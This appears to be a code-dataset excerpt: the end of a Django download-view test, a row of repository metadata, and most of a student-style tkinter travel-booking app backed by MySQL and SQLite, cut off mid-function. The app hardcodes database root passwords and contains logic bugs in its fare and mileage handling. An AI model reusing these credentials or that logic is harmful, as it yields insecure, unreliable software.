theme = Theme.objects.create(theme=theme)
return CustomUser.objects.create_user(username, location=location, theme=theme, premium=premium)
def test_get(self):
user = self.create_user(premium=True)
self.client.force_login(user)
resp = self.client.get(resolve_url(f'{APP_NAME}:download', file_type='csv'))
self.assertEqual(404, resp.status_code)
def test_get_ng(self):
user = self.create_user()
self.client.force_login(user)
resp = self.client.get(resolve_url(f'{APP_NAME}:download', file_type='csv'))
self.assertEqual(403, resp.status_code)
| 37.768519 | 112 | 0.684727 | 508 | 4,079 | 5.377953 | 0.125984 | 0.069546 | 0.079063 | 0.114202 | 0.855051 | 0.838946 | 0.838946 | 0.784773 | 0.784773 | 0.784773 | 0 | 0.007864 | 0.189507 | 4,079 | 107 | 113 | 38.121495 | 0.818512 | 0 | 0 | 0.6875 | 0 | 0 | 0.056141 | 0.010297 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.2375 | false | 0 | 0.05 | 0 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3efc905b61a2d18211e8ce774e3e076640d57e8c | 175,404 | py | Python | TRAVEL AGENCY M.py | ShubhankarSah/Travel-Management-System | 77046beb26542e4e4cc5b16e87cd86b493060751 | [
"MIT"
] | null | null | null | TRAVEL AGENCY M.py | ShubhankarSah/Travel-Management-System | 77046beb26542e4e4cc5b16e87cd86b493060751 | [
"MIT"
] | null | null | null | TRAVEL AGENCY M.py | ShubhankarSah/Travel-Management-System | 77046beb26542e4e4cc5b16e87cd86b493060751 | [
"MIT"
] | null | null | null | from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
import time
import random
import sqlite3
global x1,x2,x3,x4
import tkinter.ttk as ttk
import datetime
import mysql.connector as sqlcon
import pymysql
#=========================================================================================================================================
con=sqlcon.connect(host="localhost",user="root",password="Aman1234")#connection to mysql
cur=con.cursor()
cur = con.cursor(buffered=True)
cur.execute("create database if not exists travell")
cur.execute("use travell")
cur.execute("create table if not exists new"
"("
"Receipt_Ref varchar(50),"
"DateofOrder char(50),"
"Firstname char(50),"
"Surname char(50),"
"Address char(50),"
"PostCode varchar(50),"
"Telephone varchar(50),"
"Mobile varchar(50),"
"Email varchar(50),"
"var11 varchar(50),"
"var12 varchar(50),"
"var13 varchar(50),"
"Standard varchar(50),"
"Economy varchar(50),"
"FirstClass varchar(50),"
"PaidTax varchar(50),"
"SubTotal varchar(50),"
"TotalCosx varchar(50))")
class Travel:
def __init__(self,root):
self.root = root
self.root.title("ASRD Airways")
self.root.geometry("1350x750+0+0")
self.root.configure(background='black')
DateofOrder=StringVar()
DateofOrder.set(time.strftime("%d/%m/%Y"))
Receipt_Ref=StringVar()
PaidTax=StringVar()
SubTotal=StringVar()
TotalCost=StringVar()
var1=IntVar()
var2=IntVar()
var3=IntVar()
var4=IntVar()
var5=IntVar()
var6=IntVar()
var7=IntVar()
var8=IntVar()
var9=IntVar()
var10=IntVar()
var11=StringVar()
var12=StringVar()
var13=StringVar()
Firstname=StringVar()
Surname=StringVar()
Address=StringVar()
PostCode=StringVar()
Telephone=StringVar()
Mobile=StringVar()
Email=StringVar()
AirportTax =StringVar()
Mile =StringVar()
Travel_Ins =StringVar()
Luggage =StringVar()
Standard=StringVar()
Economy=StringVar()
FirstClass=StringVar()
AirportTax.set("0")
Mile.set("0")
Travel_Ins.set("0")
Luggage.set("0")
Standard.set("0")
Economy.set("0")
FirstClass.set("0")
#========================================Defined Function======================================
def iExit():
iExit=tkinter.messagebox.askyesno("ASRD Airways","Are you sure want to exit")
if iExit > 0:
root.destroy()
return
def Reset():
AirportTax.set("0")
Mile.set("0")
Travel_Ins.set("0")
Luggage.set("0")
Standard.set("0")
Economy.set("0")
FirstClass.set("0")
Firstname.set("")
Surname.set("")
Address.set("")
PostCode.set("")
Telephone.set("")
Mobile.set("")
Email.set("")
PaidTax.set("")
SubTotal.set("")
TotalCost.set("")
self.txtReceipt.delete("1.0",END)
var1.set(0)
var2.set(0)
var3.set(0)
var4.set(0)
var5.set(0)
var6.set(0)
var7.set(0)
var8.set(0)
var9.set(0)
var10.set(0)
var11.set("0")
var12.set("0")
var13.set("0")
self.cboDeparture.current(0)
self.cboDestination.current(0)
self.cboAccommodation.current(0)
self.txtAirportTax.configure(state =DISABLED)
self.txtMile.configure(state =DISABLED)
self.txtTravelling_Insurance.configure(state =DISABLED)
self.txtExt_Luggage.configure(state =DISABLED)
self.txtStandard.configure(state =DISABLED)
self.txtEconomy.configure(state =DISABLED)
self.txtFirstClass.configure(state =DISABLED)
def Receipt():
self.txtReceipt.delete("1.0",END)
x=random.randint(10853, 500831)
randomRef = str(x)
Receipt_Ref.set("Travel Bill: " + randomRef)
self.txtReceipt.insert(END,'Receipt Ref:\t\t\t\t\t' + Receipt_Ref.get() + "\n")
self.txtReceipt.insert(END,'Date:\t\t\t\t\t' + DateofOrder.get() + "\n")
self.txtReceipt.insert(END,'Flight:\t\t\t\t\t' + "Travelling Details \n")
self.txtReceipt.insert(END,'Firstname:\t\t\t\t\t' + Firstname.get() + "\n")
self.txtReceipt.insert(END,'Surname:\t\t\t\t\t' + Surname.get() + "\n")
self.txtReceipt.insert(END,'Address:\t\t\t\t\t' + Address.get() + "\n")
self.txtReceipt.insert(END,'PostCode: \t\t\t\t\t' + PostCode.get()+ "\n")
self.txtReceipt.insert(END,'Telephone: \t\t\t\t\t' + Telephone.get()+ "\n")
self.txtReceipt.insert(END,'Mobile: \t\t\t\t\t' + Mobile.get() + "\n")
self.txtReceipt.insert(END,'Email: \t\t\t\t\t'+ Email.get()+ "\n")
self.txtReceipt.insert(END,'Standard: \t\t\t\t\t'+ var11.get()+ "\n")
self.txtReceipt.insert(END,'Economy: \t\t\t\t\t'+ var12.get()+ "\n")
self.txtReceipt.insert(END,'FirstClass: \t\t\t\t\t'+ var13.get()+ "\n")
self.txtReceipt.insert(END,'Standard: \t\t\t\t\t'+ Standard.get()+ "\n")
self.txtReceipt.insert(END,'Economy: \t\t\t\t\t'+ Economy.get()+ "\n")
self.txtReceipt.insert(END,'FirstClass: \t\t\t\t\t'+ FirstClass.get()+ "\n")
self.txtReceipt.insert(END,'Paid:\t\t\t\t\t' + PaidTax.get()+"\n")
self.txtReceipt.insert(END,'SubTotal:\t\t\t\t\t' + str(SubTotal.get()) +"\n")
self.txtReceipt.insert(END,'Total Cost:\t\t\t\t\t' + str(TotalCost.get()))
#===========================================================SQL ADDITION =======================================================================
sqlCon = pymysql.connect(host="localhost", user="root",password="scott",database="travell")
cur=sqlCon.cursor()
cur.execute("insert into new values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)",(
Receipt_Ref.get(),
DateofOrder.get(),
Firstname.get(),
Surname.get(),
Address.get(),
PostCode.get(),
Telephone.get(),
Mobile.get(),
Email.get(),
var11.get(),
var12.get(),
var13.get(),
Standard.get(),
Economy.get(),
FirstClass.get(),
PaidTax.get(),
SubTotal.get(),
TotalCost.get()
))
sqlCon.commit()
sqlCon.close()
tkinter.messagebox.showinfo("success","record entered succefully")
def Airport_Tax():
global paid1
if (var1.get() == 1):
self.txtAirportTax.configure(state= NORMAL)
Item1=float(45)
AirportTax.set("INR" + str(Item1))
paid1 = AirportTax.get()
AirportTax.set("INR" + str(Item1))
elif var1.get()== 0:
self.txtAirportTax.configure(state= DISABLED)
AirportTax.set("0")
def Mileage():
global Item2
if (var2.get() == 1):
self.txtMile.configure(state= NORMAL)
Item2=(23345)
Mile.set((Item2))
elif var1.get()== 0:
self.txtMile.configure(state= DISABLED)
Mile.set("0")
def Travelling():
global Item3
if (var3.get() == 1):
self.txtTravelling_Insurance.configure(state= NORMAL)
Item3=float(63)
Travel_Ins.set("INR" + str(Item3))
elif var3.get()== 0:
self.txtTravelling_Insurance.configure(state= DISABLED)
Travel_Ins.set("0")
def Lug():
global Item4
if (var4.get() == 1):
self.txtExt_Luggage.configure(state= NORMAL)
Item4=float(334.59)
Luggage.set("INR" + str(Item4))
elif var4.get()== 0:
self.txtExt_Luggage.configure(state= DISABLED)
Luggage.set("0")
def Standard_Fees():
global Item5
if (var5.get() == 1):
self.txtStandard.configure(state= NORMAL)
Item5=float(274.9)
Standard.set("INR" + str(Item5))
elif var5.get()== 0:
self.txtStandard.configure(state= DISABLED)
Standard.set("0")
def Economy_Fees():
global Item6
if (var7.get() == 1):
self.txtEconomy.configure(state= NORMAL)
Item6=float(365.5)
Economy.set("INR" + str(Item6))
elif var7.get()== 0:
self.txtEconomy.configure(state= DISABLED)
Economy.set("0")
def FirstClass_Fees():
global Item7
if (var9.get() == 1 ):
self.txtFirstClass.configure(state= NORMAL)
Item7=float(564.3)
FirstClass.set("INR" + str(Item7))
elif (var9.get() == 0):
self.txtFirstClass.configure(state= DISABLED)
FirstClass.set("0")
def Total_Paid():
if ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var5.get() == 1 and var11.get() =="Delhi"
and var12.get()=="Kolkata" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(274.9)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR"+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR"+ str('%.2f'%((Cost_of_Fare)))
TT = "INR"+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var7.get() == 1 and var11.get() =="Kolkata"
and var12.get()=="Delhi" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(365.5)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR"+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR"+ str('%.2f'%((Cost_of_Fare)))
TT = "INR"+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var9.get() == 1 and var11.get() =="Mumbai"
and var12.get()=="Delhi" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(564.3)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR "+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR "+ str('%.2f'%((Cost_of_Fare)))
TT = "INR "+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var9.get() == 1 and var11.get() =="Mumbai"
and var12.get()=="Kolkata" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(564.3)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR "+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR "+ str('%.2f'%((Cost_of_Fare)))
TT = "INR "+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
elif ( var1.get() == 1 and var2.get() == 1 and var3.get() == 1 and var4.get() == 1 and
var9.get() == 1 and var11.get() =="Delhi"
and var12.get()=="Mumbai" and var13.get() =="1"):
q1 =float(45)
q2 =float(63)
q3 =float(334.59)
q4 = float(564.3)
Cost_of_Fare = q1 + q2 + q3 + q4
Tax="INR "+ str('%.2f'%((Cost_of_Fare)*0.09))
ST="INR "+ str('%.2f'%((Cost_of_Fare)))
TT = "INR "+ str('%.2f'%(Cost_of_Fare + ((Cost_of_Fare)*0.09)))
PaidTax.set((Tax))
SubTotal.set(ST)
TotalCost.set(TT)
#==============================================================================================
MainFrame=Frame(self.root)
MainFrame.grid()
Tops = Frame(MainFrame, bd=20, width=750,relief=RIDGE)
Tops.pack(side=TOP)
self.lblTitle=Label(Tops, font=('arial',70,'bold'),width=25,bg="blue",fg="white",text="ASRD Airways")
self.lblTitle.grid()
#==============================================================================================
CustomerDetailsFrame=Frame(MainFrame, width=750,height=500, bd=20, pady=5,relief=RIDGE)
CustomerDetailsFrame.pack(side=BOTTOM)
FrameDetails=Frame(CustomerDetailsFrame, width=600,height=400, bd=10,relief=RIDGE)
FrameDetails.pack(side=LEFT)
CustomerName=LabelFrame(FrameDetails, width=150,height=250, bd=10,
font=('arial',12,'bold'), text='Customer Details', relief=RIDGE)
CustomerName.grid(row=0,column=0)
TravelFrame = LabelFrame(FrameDetails,bd=10,width=300,height=250,
font=('arial',12, 'bold'),text = 'Travel Details',relief=RIDGE)
TravelFrame.grid(row=0,column=1)
Ticket_Frame = LabelFrame(FrameDetails, width=300,height=150,relief=FLAT)
Ticket_Frame.grid(row=1,column=0)
CostFrame = LabelFrame(FrameDetails, width=150,height=150,relief=FLAT)
CostFrame.grid(row=1,column=1)
#==============================================================================================
Receipt_ButtonFrame=Frame(CustomerDetailsFrame, bd=10,width=350,height=400,relief=RIDGE)
Receipt_ButtonFrame.pack(side=RIGHT)
ReceiptFrame=LabelFrame(Receipt_ButtonFrame, width=350,height=300,
font=('arial',12,'bold'), text='Receipt', relief=RIDGE)
ReceiptFrame.grid(row=0,column=0)
ButtonFrame=LabelFrame(Receipt_ButtonFrame, width=350,height=100,relief=RIDGE)
ButtonFrame.grid(row=1,column=0)
#=====================================CustomerName==========================================
self.lblFirstname = Label(CustomerName,font=('arial', 14,'bold'), text="Firstname", bd=7)
self.lblFirstname.grid(row=0,column=0, sticky=W)
self.txtFirstname = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Firstname, bd=7,
insertwidth=2, justify=RIGHT)
self.txtFirstname.grid(row=0,column=1)
self.lblSurname = Label(CustomerName,font=('arial', 14,'bold'), text="Surname", bd=7)
self.lblSurname.grid(row=1,column=0, sticky=W)
self.txtSurname= Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Surname, bd=7,
insertwidth=2, justify=RIGHT)
self.txtSurname.grid(row=1,column=1)
self.lblAddress = Label(CustomerName,font=('arial', 14,'bold'), text="Address", bd=7)
self.lblAddress.grid(row=2,column=0, sticky=W)
self.txtAddress = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Address, bd=7,
insertwidth=2,justify=RIGHT)
self.txtAddress.grid(row=2,column=1)
self.lblPostCode = Label(CustomerName,font=('arial', 14,'bold'), text="Post Code", bd=7)
self.lblPostCode .grid(row=3,column=0, sticky=W)
self.txtPostCode = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=PostCode , bd=7,
insertwidth=2, justify=RIGHT)
self.txtPostCode .grid(row=3,column=1)
self.lblTelephone = Label(CustomerName,font=('arial', 14,'bold'), text="Telephone", bd=7)
self.lblTelephone.grid(row=4,column=0, sticky=W)
self.txtTelephone= Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Telephone, bd=7,
insertwidth=2, justify=RIGHT)
self.txtTelephone.grid(row=4,column=1)
self.Mobile = Label(CustomerName,font=('arial', 14,'bold'), text="Mobile No.", bd=7)
self.Mobile.grid(row=5,column=0, sticky=W)
self.Mobile = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Mobile, bd=7,
insertwidth=2,justify=RIGHT)
self.Mobile.grid(row=5,column=1)
self.lblEmail = Label(CustomerName,font=('arial', 14,'bold'), text="Email", bd=7)
self.lblEmail.grid(row=6,column=0, sticky=W)
self.txtEmail = Entry(CustomerName,font=('arial', 14,'bold'), textvariable=Email, bd=7,
insertwidth=2,justify=RIGHT)
self.txtEmail.grid(row=6,column=1)
#======================================Flight Information=====================================
self.lblDeparture = Label(TravelFrame,font=('arial', 14,'bold'), text="Departure", bd=7)
self.lblDeparture.grid(row=0,column=0, sticky=W)
self.cboDeparture =ttk.Combobox(TravelFrame, textvariable = var11, state='readonly', font=('arial',20, 'bold'),
width=14)
self.cboDeparture['value']=('','Delhi', 'Mumbai','Kolkata','Luton')
self.cboDeparture.current(0)
self.cboDeparture.grid(row=0,column=1)
self.lblDestination = Label(TravelFrame,font=('arial', 14,'bold'), text="Destination", bd=7)
self.lblDestination.grid(row=1,column=0, sticky=W)
self.cboDestination =ttk.Combobox(TravelFrame,textvariable = var12, state='readonly', font=('arial',20, 'bold'),
width=14)
self.cboDestination['value']=('','Delhi', 'Mumbai','Kolkata')
self.cboDestination.current(0)
self.cboDestination.grid(row=1,column=1)
self.lblAccommodation = Label(TravelFrame,font=('arial', 14,'bold'), text="Accommodation", bd=7)
self.lblAccommodation.grid(row=2,column=0, sticky=W)
self.cboAccommodation =ttk.Combobox(TravelFrame,textvariable = var13,state='readonly',font=('arial',20, 'bold'),
width=14)
self.cboAccommodation['value']=('','1', '2','3','4')
self.cboAccommodation.current(1)
self.cboAccommodation.grid(row=2,column=1)
#==============================================================================================
self.chkAirportTax=Checkbutton(TravelFrame,text="Airport Tax",variable = var1, onvalue=1, offvalue=0,
font=('arial', 16,'bold'), command=Airport_Tax).grid(row =3, column=0, sticky=W)
self.txtAirportTax = Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=AirportTax, bd=7,
insertwidth=2,state = DISABLED,justify=RIGHT)
self.txtAirportTax.grid(row=3,column=1)
self.chkMile = Checkbutton(TravelFrame, text="Air Mile", variable=var2, onvalue = 1, offvalue = 0,
font=('arial',16, 'bold'),command=Mileage).grid(row=4, column=0,sticky=W)
self.txtMile= Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=Mile, bd=7,
insertwidth=2,state= DISABLED, justify=RIGHT)
self.txtMile.grid(row=4,column=1)
self.chkTravelling_Insurance = Checkbutton(TravelFrame, text="Travelling Insurance ", variable=var3,
onvalue = 1, offvalue = 0,
font=('arial',16, 'bold'), command= Travelling).grid(row=5, column=0,sticky=W)
self.txtTravelling_Insurance= Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=Travel_Ins, bd=7,
insertwidth=2,state= DISABLED, justify=RIGHT)
self.txtTravelling_Insurance.grid(row=5,column=1)
self.chkExt_Luggage = Checkbutton(TravelFrame, text="Ext. Luggage", variable=var4, onvalue = 1, offvalue = 0,
font=('arial',16, 'bold'), command= Lug).grid(row=6, column=0,sticky=W)
self.txtExt_Luggage= Entry(TravelFrame,font=('arial', 14,'bold'), textvariable=Luggage, bd=7,
insertwidth=2, state= DISABLED, justify=RIGHT)
self.txtExt_Luggage.grid(row=6,column=1)
#=======================================Payment Information====================================
self.lblPaidTax = Label(CostFrame,font=('arial', 14,'bold'), text="Paid Tax\t\t", bd=7,)
self.lblPaidTax.grid(row=0,column=2, sticky=W)
self.txtPaidTax = Entry(CostFrame,font=('arial', 14,'bold'), textvariable=PaidTax, bd=7,
width=26, justify=RIGHT)
self.txtPaidTax.grid(row=0,column=3)
self.lblSubTotal = Label(CostFrame,font=('arial', 14,'bold'), text="Sub Total", bd=7,)
self.lblSubTotal.grid(row=1,column=2, sticky=W)
self.txtSubTotal= Entry(CostFrame,font=('arial', 14,'bold'), textvariable=SubTotal, bd=7,
width=26, justify=RIGHT)
self.txtSubTotal.grid(row=1,column=3)
self.lblTotalCost = Label(CostFrame,font=('arial', 14,'bold'), text="Total Cost", bd=7,)
self.lblTotalCost.grid(row=2,column=2, sticky=W)
self.txtTotalCost = Entry(CostFrame,font=('arial', 14,'bold'), textvariable=TotalCost, bd=7,
width=26,justify=RIGHT)
self.txtTotalCost.grid(row=2,column=3)
#==============================================================================================
self.chkStandard =Checkbutton(Ticket_Frame,text="Standard", variable=var5, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold'),command=Standard_Fees).grid(row=0,column=0)
self.txtStandard= Entry(Ticket_Frame,font=('arial', 14,'bold'),width=6,textvariable=Standard,bd=5,
state =DISABLED,justify=RIGHT)
self.txtStandard.grid(row=0,column=1)
self.chkSingle = Checkbutton(Ticket_Frame, text="Single", variable=var6, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold')).grid(row=0, column=2,sticky=W)
self.chkEconomy = Checkbutton(Ticket_Frame, text="Economy", variable=var7,onvalue = 1, offvalue = 0,
font=('arial',14, 'bold'),command= Economy_Fees).grid(row=1, column=0,sticky=W)
self.txtEconomy= Entry(Ticket_Frame,font=('arial', 14,'bold'),width=6,textvariable=Economy,bd=5,
state =DISABLED,justify=RIGHT)
self.txtEconomy.grid(row=1,column=1)
self.chkReturn = Checkbutton(Ticket_Frame, text="Return", variable=var8, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold')).grid(row=1, column=2,sticky=W)
self.chkFirstClass = Checkbutton(Ticket_Frame,text="FirstClass", variable=var9, onvalue = 1, offvalue = 0,
font=('arial',14, 'bold'), command= FirstClass_Fees).grid(row=2,column=0)
self.txtFirstClass= Entry(Ticket_Frame,font=('arial', 14,'bold'),width=6,textvariable=FirstClass,bd=5,
state =DISABLED,justify=RIGHT)
self.txtFirstClass.grid(row=2,column=1)
self.chkSpecialsNeeds = Checkbutton(Ticket_Frame, text="Specials Needs",variable=var10, onvalue = 1,
offvalue = 0, font=('arial',14, 'bold')).grid(row=2, column=2,sticky=W)
#==========================================Receipt=============================================
self.txtReceipt=Text(ReceiptFrame, width=40, height=21,font=('arial', 10,'bold'))
self.txtReceipt.grid(row=0,column=0)
#===========================================Buttons============================================
self.btnTotal=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Total', command=Total_Paid).grid(row=0,column=0)
self.btnReceipt=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Receipt', command=Receipt).grid(row=0,column=1)
self.btnReset=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Reset', command=Reset).grid(row=0,column=2)
self.btnExit=Button(ButtonFrame, padx=18, bd=7,font=('arial', 16,'bold'), width=4,
text='Exit', command=iExit).grid(row=0,column=3)
#==============================================================================================
def air():
if __name__=='__main__':
root = Toplevel(master)
application = Travel (root)
root.mainloop()
#======Main Screen======#
master = Tk()
master.geometry('1020x750+0+0')
master.title('Travel Agency')
master.configure(bg="medium violet red")
notif = Label(master, font=('Calibri',12))
notif.grid(row=6,sticky=N,pady=10)
def road():
global conn, cursor
conn = sqlite3.connect('Railway.db')
c = conn.cursor()
global root
global LoginId,count
global Password
global FROM
global DESTINATION
global Date
global Name
global Age,Gender,IdProof
global variable,variable1,variable2,v2,var
global DepartureTime, TrainNumber, Number
def createWindow():
global conn, cursor
conn = sqlite3.connect('Railway.db')
cursor = conn.cursor()
global root
global head
global FROM
global DESTINATION
global Date
global Name
global Age,Gender,Id_Proof
global variable,variable1,variable2,v2,var
global DepartureTime, TrainNumber, Number
root = Toplevel(master)
root.title("Railways 1")
customFont = tkFont.Font(family="Segoe Print", size=14)
root.geometry('1020x750+0+0')
root.config(bg='coral')
entry1 = Entry(root,justify='center',font=('Slab Serif',3))
entry1.place(x=320,y=10)
entry2 = Entry(root, justify='center',font=('Slab Serif', 3))
entry2.place(x=320,y=10)
entry3 = Entry(root, justify='center',font=('Slab Serif', 3))
entry3.place(x=320,y=10)
Label(root, text="ASRD Raliways",font=('Gabriola',50,'bold'),fg="gold2", bg="magenta4").place(x=320,y=10)
def fun_1(*args):
entry1.insert(10,variable.get())
def fun_2(*args):
entry2.insert(10,variable1.get())
def fun_3(*args):
entry3.insert(10,variable2.get())
variable = StringVar(root)
choices = {'Howrah', 'Lucknow','Ranchi','Hatia'}
variable.set('Choose')
variable.trace("w", fun_1)
popupMenu = OptionMenu(root, variable, *choices)
popupMenu.place(x=550, y=180,width=200)
popupMenu.config(font=('Segoe UI Black',18),bg="light sea green",fg="coral4")
Label(root, text="FROM:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=180)
variable1 = StringVar(root)
trains = {'New Delhi','Chandigarh','Patna','Gaya'}
variable1.set('Choose')
variable1.trace("w", fun_2)
popupMenu1 = OptionMenu(root, variable1, *trains)
Label(root, text="DESTINATION:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=240)
popupMenu1.config(font=('Segoe UI Black',18),bg="light sea green",fg="coral4")
popupMenu1.place(x=550, y=240,width=200)
variable2 = StringVar(root)
classes = {'1A','2A','3A'}
variable2.set('Choose')
variable2.trace("w", fun_3)
popupMenu1 = OptionMenu(root, variable2, *classes)
Label(root, text="ALL CLASSES:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=300)
popupMenu1.config(font=('Segoe UI Black', 18), bg="light sea green",fg="coral4")
popupMenu1.place(x=550, y=300,width=200)
Label(root,text="DATE:",font=('Segoe Print',15,'bold'),fg="violetred4", bg="olivedrab2").place(x=220,y=360)
Date=StringVar()
e1=Entry(root,textvariable=Date)
def Check():
if len(e1.get()) == 0 or len(entry1.get()) == 0 or len(entry2.get()) == 0 or len(entry3.get()) == 0:
tkinter.messagebox.showinfo('Error!!','Select the required options')
else:
Check1()
def Check1():
if (entry1.get() == "Lucknow" and entry2.get() == "Chandigarh" and entry3.get() == "3A") or (entry1.get() == "Lucknow" and entry2.get() == "New Delhi" and entry3.get() == "3A"):
tkinter.messagebox.showinfo('Sorry!!!','No Trains Available!')
else:
ops = e1.get()
len1 = len(ops)
if len1==10:
date1=ops[0]+ops[1]
month1=ops[3]+ops[4]
year11=ops[6]+ops[7]+ops[8]+ops[9]
if(len1==10):
if(int(date1)<=31 and int(date1)>=1):
if(int(month1)>=1 and int(month1)<=12):
if(int(year11)>=2010 and int(year11)<=2030):
print('')
else:
tkinter.messagebox.showinfo('Error!', 'Enter in Correct DD-MM-YYYY Format')
else:
tkinter.messagebox.showinfo('Error!', 'Enter in Correct DD-MM-YYYY Format')
else:
tkinter.messagebox.showinfo('Error!', 'Enter in Correct DD-MM-YYYY Format')
root.destroy()
Search()
else:
tkinter.messagebox.showinfo('Error!', 'Enter the date Correctly!')
#print('list1 print',list1)
#window.destroy()
#Search()
def Search():
global x1
window1=Toplevel(master)
window1.title("Trains' Schedule")
window1.config(bg='palevioletred4')
window1.geometry('1020x450+0+0')
height =2
width =7
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e2 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e3 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e4 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e5 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e6 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
e7 = Entry(window1, justify="center",font=('Gabriola',11,'bold'), bg="orange2", fg="red3")
en8 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e9 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e10 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e11 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e12 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e13 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e14 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
en15 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e16 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e17 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e18 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e19 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e20 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e21 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
en22 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e23 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e24 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e25 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e26 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e27 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e28 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
en29 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e30 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e31 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e32 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e33 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e34 = Entry(window1, justify="center",font=('Comic Sans MS',9), bg="light pink")
e35 = Entry(window1, justify="center",font=('Comic Sans MS',9),fg="lemon chiffon", bg="firebrick1")
e1.grid(row=0, column=0)
e2.grid(row=0, column=1)
e3.grid(row=0, column=2)
e4.grid(row=0, column=3)
